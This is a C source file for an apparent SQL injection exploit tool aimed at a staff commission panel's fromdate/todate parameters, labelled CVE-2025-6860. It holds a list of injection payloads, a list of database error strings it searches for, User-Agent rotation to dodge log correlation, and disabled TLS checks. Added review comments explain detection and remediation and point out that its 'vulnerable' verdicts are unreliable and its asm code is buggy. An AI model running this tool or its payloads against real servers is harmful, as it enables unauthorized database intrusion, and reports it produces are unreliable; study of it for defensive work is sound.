#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include "argparse.h"
/*
 * Growable response buffer filled by write_cb().
 * `buffer` is the heap block holding the received body; `len` is the number
 * of body bytes stored, not counting the trailing NUL write_cb() appends.
 */
struct Mem
{
char *buffer;
size_t len;
};
/*
 * Probe strings. sd() formats each entry, unmodified, into BOTH the
 * `fromdate` and `todate` query parameters of /panel/staff_commision.php.
 *
 * Defender view: none of these entries is a valid date, so strict
 * server-side date validation on the two parameters rejects all of them;
 * binding the values through parameterised queries is the standard
 * remediation for this class of bug. In access logs the probes appear as
 * quote characters, OR/AND tautologies, a UNION SELECT fragment and
 * comment markers inside fields that should only ever hold dates.
 */
const char *p[] =
{
"' OR 1 -- -",
"\" OR \"\" = \"",
" OR 1 = 1 -- -",
"' OR '' = '",
"AND 1",
"AND 0",
"AND true",
"AND false",
"1-false",
"-1 UNION SELECT 1 INTO @,@,@",
"admin' or '1'='1",
"admin' or '1'='1'--",
"admin' or '1'='1'#",
"-",
" ",
"&",
"^",
"*"
};
/*
 * Error-message fragments that sd() searches for (case-sensitive strstr)
 * in the response body; a single match is reported as a positive result.
 *
 * NOTE(review): several entries ("Fatal error", "Unhandled Exception",
 * "Database error", "NativeError") are generic application errors rather
 * than SQL-specific ones, so a match does not by itself prove injection.
 * Conversely, a server that suppresses verbose errors produces no match
 * even if the query is still built unsafely, so hiding error output
 * removes this signal but is not a fix.
 */
const char *sq[] =
{
"syntax error",
"Warning: mysql_fetch_assoc()",
"Warning: mysqli_query()",
"SQLSTATE",
"Invalid query",
"Unclosed quotation mark",
"quoted string not properly terminated",
"You have an error in your SQL syntax",
"Warning: pg_query()",
"Warning: pg_send_query()",
"pg_query(): Query failed",
"Microsoft OLE DB Provider for SQL Server",
"Incorrect syntax near",
"Unclosed quotation mark after the character string",
"SQL error",
"mysql_num_rows() expects parameter",
"mysql_fetch_array() expects parameter",
"Fatal error",
"mysql_fetch_object() expects parameter",
"mysqli_fetch_assoc() expects parameter",
"mysql_fetch_row() expects parameter",
"supplied argument is not a valid MySQL",
"Warning: mssql_query()",
"syntax error at or near",
"org.hibernate.exception",
"unexpected end of SQL command",
"SQL query failed",
"database query error",
"DB2 SQL error",
"OLE DB provider returned message",
"JDBC SQL error",
"pg_fetch_array() expects parameter",
"pg_fetch_assoc() expects parameter",
"Query execution failed",
"Database error",
"Unhandled Exception",
"ORA-00933: SQL command not properly ended",
"ORA-01756: quoted string not properly terminated",
"SQL Server Error",
"mysql_numrows() expects parameter",
"mysql_num_fields() expects parameter",
"Syntax error or access violation",
"SQL syntax error",
"NativeError",
"ODBC SQL Server Driver",
"Warning: odbc_exec()",
"Warning: odbc_prepare()",
"Fatal error: Call to a member function",
};
/*
 * User-Agent strings that g() cycles through, one per request.
 *
 * Defender view: because the header changes on every request, log
 * correlation and alerting for this traffic should key on the request path
 * and the content of the fromdate/todate parameters, not on User-Agent.
 */
const char *a[] =
{
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36",
"Mozilla/5.0 (Linux; Android 4.4.2; SM-P600 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0",
"Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36",
"Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36",
"Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0"
};
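/*
 * libcurl write callback: appends one received chunk to the growing,
 * NUL-terminated buffer held in the struct Mem passed as `userdata`.
 *
 * ptr      - chunk delivered by libcurl (not NUL-terminated)
 * size     - element size
 * nmemb    - element count; the chunk is size * nmemb bytes long
 * userdata - struct Mem * that accumulates the body
 *
 * Returns the number of bytes consumed. Any other value than size * nmemb
 * makes libcurl abort the transfer, which is how allocation failure and
 * size overflow are reported here. The body comes from a remote server
 * and is untrusted, so every size computation is checked before use.
 */
size_t write_cb(void *ptr,
                size_t size,
                size_t nmemb,
                void *userdata)
{
    struct Mem *m = (struct Mem *)userdata;
    size_t total = size * nmemb;

    /* Reject a chunk whose byte count wrapped around in the multiply. */
    if (nmemb != 0 && total / nmemb != size)
        return 0;

    /* Reject growth that would wrap len + total + 1 (the +1 is the NUL). */
    if (m->len >= (size_t)-1 || total > (size_t)-1 - 1 - m->len)
        return 0;

    /* Grow through a temporary so the old block survives a failed realloc. */
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp)
        return 0;
    m->buffer = tmp;

    /* Skip the copy for an empty chunk; memcpy with a null source is undefined. */
    if (total != 0)
        memcpy(m->buffer + m->len, ptr, total);

    m->len += total;
    m->buffer[m->len] = '\0';   /* keep the buffer usable as a C string */
    return total;
}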
/*
 * Sets the User-Agent of `curl` to the next entry of the file-level table
 * `a`. A static cursor remembers the position between calls and wraps back
 * to the first entry after the last one has been used.
 */
void g(CURL *curl)
{
    static int cursor = 0;
    static int table_len = sizeof(a) / sizeof(a[0]);
    const char *agent = a[cursor];

    /* Advance for the next call, wrapping at the end of the table. */
    cursor++;
    if (cursor >= table_len)
        cursor = 0;

    curl_easy_setopt(curl, CURLOPT_USERAGENT, agent);
}
/*
 * Probe loop for the fromdate/todate issue this file labels CVE-2025-6860.
 *
 * For every entry of the file-level table `p` it builds
 *   <u>/panel/staff_commision.php?fromdate=<entry>&todate=<entry>
 * issues a GET through libcurl, and classifies the result from the HTTP
 * status code and from whether the accumulated response body contains any
 * string of the file-level table `sq`.
 *
 * u - base URL supplied by the caller; it is used as a prefix only.
 *
 * Status text is emitted partly with printf and partly with raw Linux
 * x86-64 `syscall` instructions (1 = write, 35 = nanosleep, 59 = execve,
 * 60 = exit), so the function is Linux/x86-64 specific and the two output
 * paths are not ordered with respect to each other when stdout is buffered.
 *
 * NOTE(review): the verdicts printed below are unreliable as written (see
 * the notes at the status check and the body search); treat any "vulnerable"
 * line as a lead to verify, not as a finding.
 */
void sd(const char *u)
{
const char *m1 = "\e[1;32m[+] Don't forget to put a correct link consisting of the parameters that suffer from the vulnerability.\n";
const char *m2 = "\n\e[1;32m[+] which are fromdate and todate.\n";
const char *sk = "\n\e[1;37m-------------------------------------------------------------------------------------------------------------------\n";
const char *m3 = "\n\e[1;34m[+] Exploitation of CVE-2025-6860 has begun...";
/* Lengths are strlen - 1, so the final byte of each message is not written. */
size_t l1 = strlen(m1) - 1;
size_t l2 = strlen(m2) - 1;
/* NOTE(review): l3 is derived from m2, not m3, so the third write emits only
 * strlen(m2) - 1 bytes of m3 and the message is cut short. `sk` is unused. */
size_t l3 = strlen(m2) - 1;
/* Three write(1, msg, len) calls issued directly through `syscall`.
 * NOTE(review): `syscall` also overwrites rcx and r11 and these blocks read
 * memory, but only rax/rdi/rsi/rdx are declared as clobbers; an input operand
 * the compiler placed in rcx or r11 would be destroyed after the first call.
 * The same applies to every inline-asm block in this function. */
__asm__ volatile
(
"xor %%rax, %%rax\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[m1], %%rsi\n\t"
"mov %[l1], %%rdx\n\t"
"syscall\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[m2], %%rsi\n\t"
"mov %[l2], %%rdx\n\t"
"syscall\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[m3], %%rsi\n\t"
"mov %[l3], %%rdx\n\t"
"syscall\n\t"
:
: [m1] "r"(m1),
[l1] "r"(l1),
[m2] "r"(m2),
[l2] "r"(l2),
[m3] "r"(m3),
[l3] "r"(l3)
: "rax","rdi","rsi","rdx"
);
CURL *curl = curl_easy_init();
/* Handle creation failed: print three messages, then execve /sbin/ifconfig
 * and, if that returns, exit with status 0. Control never reaches the code
 * after this branch, so `curl` is non-NULL from here on.
 * NOTE(review): curl_easy_init() failing indicates a library/allocation
 * problem, not a network problem, so the advice printed here is misleading. */
if (curl == NULL)
{
const char *i = "/sbin/ifconfig";
/* NOTE(review): argv[0] is NULL, so the new program receives an empty
 * argument vector; `v` is a NULL pointer passed as the environment. */
const char *argv[] = {NULL, i};
const char *v = {NULL};
const char *e1 = "\n\e[1;31m[-] Error Create Object Curl, Please Check Your Connection\n";
const char *e2 = "\n\e[1;31m[-] Exemple Command : ping google.com / ifconfig \n";
const char *e3 = "\n\e[1;36m[+] Start Command ifconfig For check Ip And Connection...\n";
size_t el1 = strlen(e1) - 1;
size_t el2 = strlen(e2) - 1;
size_t el3 = strlen(e3) - 1;
/* write(1, e1..e3, len) via raw syscalls. */
__asm__ volatile
(
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[e1], %%rsi\n\t"
"mov %[el1], %%rdx\n\t"
"syscall\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[e2], %%rsi\n\t"
"mov %[el2], %%rdx\n\t"
"syscall\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[e3], %%rsi\n\t"
"mov %[el3], %%rdx\n\t"
"syscall\n\t"
:
: [e1] "r" (e1),
[el1] "r" (el1),
[e2] "r" (e2),
[el2] "r" (el2),
[e3] "r" (e3),
[el3] "r" (el3)
:"rax", "rdi", "rsi", "rdx"
);
/* execve(i, argv, v) followed by exit(0); the exit bypasses stdio flushing. */
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[i], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[v], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
: [i] "r"(i), [argv] "r"(argv), [v] "r"(v)
: "rax","rdi","rsi","rdx"
);
}
/* URL buffer; snprintf below truncates silently if u plus the entry exceed it. */
char f[2043];
CURLcode r;
/* One response buffer shared by ALL iterations; it is never reset inside
 * the loop, so it holds every body received so far, concatenated. */
struct Mem chunk = {NULL, 0};
int np = sizeof(p) / sizeof(p[0]);
for (int k= 0; k < np ;k++)
{
if (curl)
{
const char *fp = p[k];
/* The same entry is placed in both date parameters. */
snprintf(f,
sizeof(f),
"%s/panel/staff_commision.php?fromdate=%s&todate=%s",
u,
fp,
fp);
curl_easy_setopt(curl,
CURLOPT_URL,
f);
/* NOTE(review): this header list is built and later freed, but it is never
 * attached to the handle (no CURLOPT_HTTPHEADER call is visible), so these
 * headers are not part of the request. On the wire the traffic carries
 * libcurl's default headers plus the User-Agent chosen by g(). */
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com/");
h = curl_slist_append(h,
"Cache-Control: no-cache");
h = curl_slist_append(h,
"Pragma: no-cache");
/* Intended 0.5 s pause between requests. */
struct timespec req = {0};
req.tv_sec = 0;
req.tv_nsec = 500000000;
long ret;
/* NOTE(review): syscall 35 is nanosleep, but the template loads the constant
 * 1 into rdi and never references the &req input operand, so the kernel is
 * not given the timespec; presumably the call fails and no pause happens.
 * `ret` is never inspected. */
__asm__ volatile
(
"mov $35, %%rax\n\t"
"mov $1, %%rdi\n\t"
"xor %%rsi, %%rsi\n\t"
"syscall\n\t"
"mov %%rax, %0\n\t"
: "=r" (ret)
: "r" (&req)
: "rax", "rdi", "rsi"
);
/* Redirects are followed, so the status code and body evaluated below may
 * come from a different URL than the one in f. */
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
g(curl);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&chunk);
/* NOTE(review): certificate and host-name verification are both switched
 * off, so the peer is unauthenticated and anything on the network path can
 * alter the response that the verdict is based on. */
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
/* Second copy of the nanosleep block above, with the same operand defect. */
__asm__ volatile
(
"mov $35, %%rax\n\t"
"mov $1, %%rdi\n\t"
"xor %%rsi, %%rsi\n\t"
"syscall\n\t"
"mov %%rax, %0\n\t"
: "=r" (ret)
: "r" (&req)
: "rax", "rdi", "rsi"
);
r = curl_easy_perform(curl);
if (r == CURLE_OK)
{
long ht = 0;
/* No trailing newline here; the next message follows on the same line. */
printf("[+] Target URL : %s", u);
const char *s = "\e[1;34m[+] Request Send Success !\n";
size_t sl = strlen(s) - 1;
/* write(1, s, sl) via raw syscall. */
__asm__ volatile
(
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[s], %%rsi\n\t"
"mov %[sl], %%rdx\n\t"
"syscall\n\t"
:
: [s] "r" (s),
[sl] "r" (sl)
:"rax", "rdi", "rsi", "rdx"
);
printf("\e[1;34m[+] FULL URL : %s\n", f);
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&ht);
printf("\e[1;32m[+] HTTP CODE : %ld\n", ht);
if (ht == 200 || ht == 201 || ht == 202 || ht == 203 || ht == 204 || ht == 206)
{
int csq = sizeof(sq) / sizeof(sq[0]);
int found = 0;
/* NOTE(review): the next two lines claim an SQL vulnerability for ANY
 * listed 2xx status, before the body has been examined. A normal page
 * that ignores or rejects the parameters produces the same output. */
printf("\e[1;34m[+] The payload was successfully responded to by the server !\n");
printf("\e[1;34m[+] The server has an SQL vulnerability !\n");
/* NOTE(review): chunk holds the bodies of all earlier requests as well, so
 * one match makes every later iteration report a hit. chunk.buffer is still
 * NULL if no body data has been delivered yet (presumably e.g. a 204 on the
 * first request), in which case this strstr call is undefined behaviour. */
for (int key = 0; key < csq ; key++)
{
if (strstr(chunk.buffer, sq[key]) != NULL)
{
found = 1;
break;
}
}
if (found)
{
printf("\e[1;34m[+] A suspicious word was found in a response !\n");
printf("\e[1;34m[+] The server suffers from a CVE-2025-6860 vulnerability !\n");
curl_slist_free_all(h);
}
else
{
printf("\e[1;31m[-] No suspicious patterns found in the server response, vulnerability CVE-2025-6860 not detected.\n");
printf("\e[1;33m[!] Try to make sure that the link is correct and you can access it.\n");
curl_slist_free_all(h);
}
}
else
{
printf("\e[1;31m[-] Http Code Not 200 !\n");
printf("\e[1;32m[+] HTTP CODE : %ld\n",
ht);
printf("\e[1;33m[!] Please Check Your Connection on Server !\n");
printf("\e[1;33m[!] Exemple Command Check Access Connection : ping target.com\n");
curl_slist_free_all(h);
}
}
else
{
/* Transfer error: report and terminate. h, chunk.buffer and the curl
 * handle are not released on this path. */
fprintf(stderr, "\n\e[1;31m[-] curl_easy_perform() failed: %s\n",
curl_easy_strerror(r));
exit(1);
}
}
}
/* Normal completion: release the shared body buffer and the handle. */
free(chunk.buffer);
curl_easy_cleanup(curl);
}
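/*
 * Entry point: prints the banner, parses -u/--url with argparse and passes
 * the URL to sd().
 *
 * argc, argv - process arguments, handed unchanged to argparse_parse().
 *
 * Returns 0 in every case, including when no URL was given (the original
 * exit status is kept).
 *
 * The missing-URL path used to terminate through a raw `exit` system call
 * in inline assembly. That bypasses stdio, so the usage text printed just
 * before it was lost whenever stdout was fully buffered (a pipe or a file).
 * Returning from main flushes the streams and removes the x86-64-only asm.
 */
int main(int argc,
         const char **argv)
{
    printf(
        "\e[1;31m"
        " ⢀⣠⣤⣶⣶⣿⣿⣿⣿⣿⣷⣶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣶⡿⠿⢿⣿⣶⣶⣤⣄⡀⠀⠀⠀⠀⠀\n"
        " ⠀⠀⠀⠀⠀⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠞⠋⠉⠀⠀⠀⠀⠀⠀⠀⠉⠛⢿⣿⣷⣄⠀⠀⠀\n"
        " ⠀⠀⠀⣠⣾⣿⣿⣿⣿⠿⠛⠉⠁⠀⠀⠀⠀⠉⠙⠻⢿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣶⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣄⠀⠀\n"
        " ⠀⠀⣼⣿⣿⣿⡿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣷⡀⠀⠀⠀⢀⣶⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣧⠀⠀\n"
        " ⠀⣼⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣿⣄⠀⠀⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣧⠀ \n"
        " ⢸⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⢂⣾⣿⣿⣿⠿⠛⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ \n"
        " ⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⡿⢡⣿⣿⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿ \n"
        " ⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣱⣿⣿⣿⡿⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⡇ \n"
        " ⢿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⡟⣴⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⡇ \n"
        " ⠸⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠏⢸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿ \n"
        " ⠀⢻⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⡿⠃⠀⠀⠹⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⠃⠀ \n"
        " ⠀⠀⠹⣿⣿⣿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⣿⠟⠁⠀⠀⠀⠀⠈⢻⣿⣿⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⡿⠃⠀⠀\n"
        " ⠀⠀⠀⠈⠻⣿⣿⣿⣿⣶⣤⣀⣀⠀⠀⠀⣀⣀⣤⣶⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣶⣤⣀⣀⠀⠀⠀⢀⣀⣤⣶⣿⣿⣿⣿⠟⠀⠀⠀\n"
        " ⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀\n"
        " ⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠛⠻⠿⠿⠿⠿⠿⠟⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⢿⣿⣿⣿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
        "\e[1;37m\t\t\t\t\t@Byte Reaper\n"
    );
    printf("\e[1;37m=> My Telegram : @ByteReaper0\n");
    printf("\e[1;37m=> My Group : https://t.me/exploiterX0\n");
    printf("\e[1;34m[+] Happy exploiting !!\n");
    printf("\e[1;37m-------------------------------------------------------------------------------------------------------------------\n");

    /* Filled in by argparse when -u/--url is present; stays NULL otherwise. */
    const char *u = NULL;
    struct argparse_option options[] =
    {
        OPT_HELP(),
        OPT_STRING('u',
                   "url",
                   &u,
                   "Enter Target URL"),
        OPT_END(),
    };
    struct argparse argparse;

    argparse_init(&argparse,
                  options,
                  NULL,
                  0);
    argparse_parse(&argparse,
                   argc,
                   argv);

    if (!u)
    {
        printf("\e[1;31m[-] Please Enter Target URL !\n");
        printf("\e[1;33m[!] Exemple : ./exploit -u http://target.com/panel/staff_commision.php?fromdate=&todate=\n");
        /* Return instead of a raw exit syscall so stdio is flushed on the way out. */
        return 0;
    }

    sd(u);
    return 0;
}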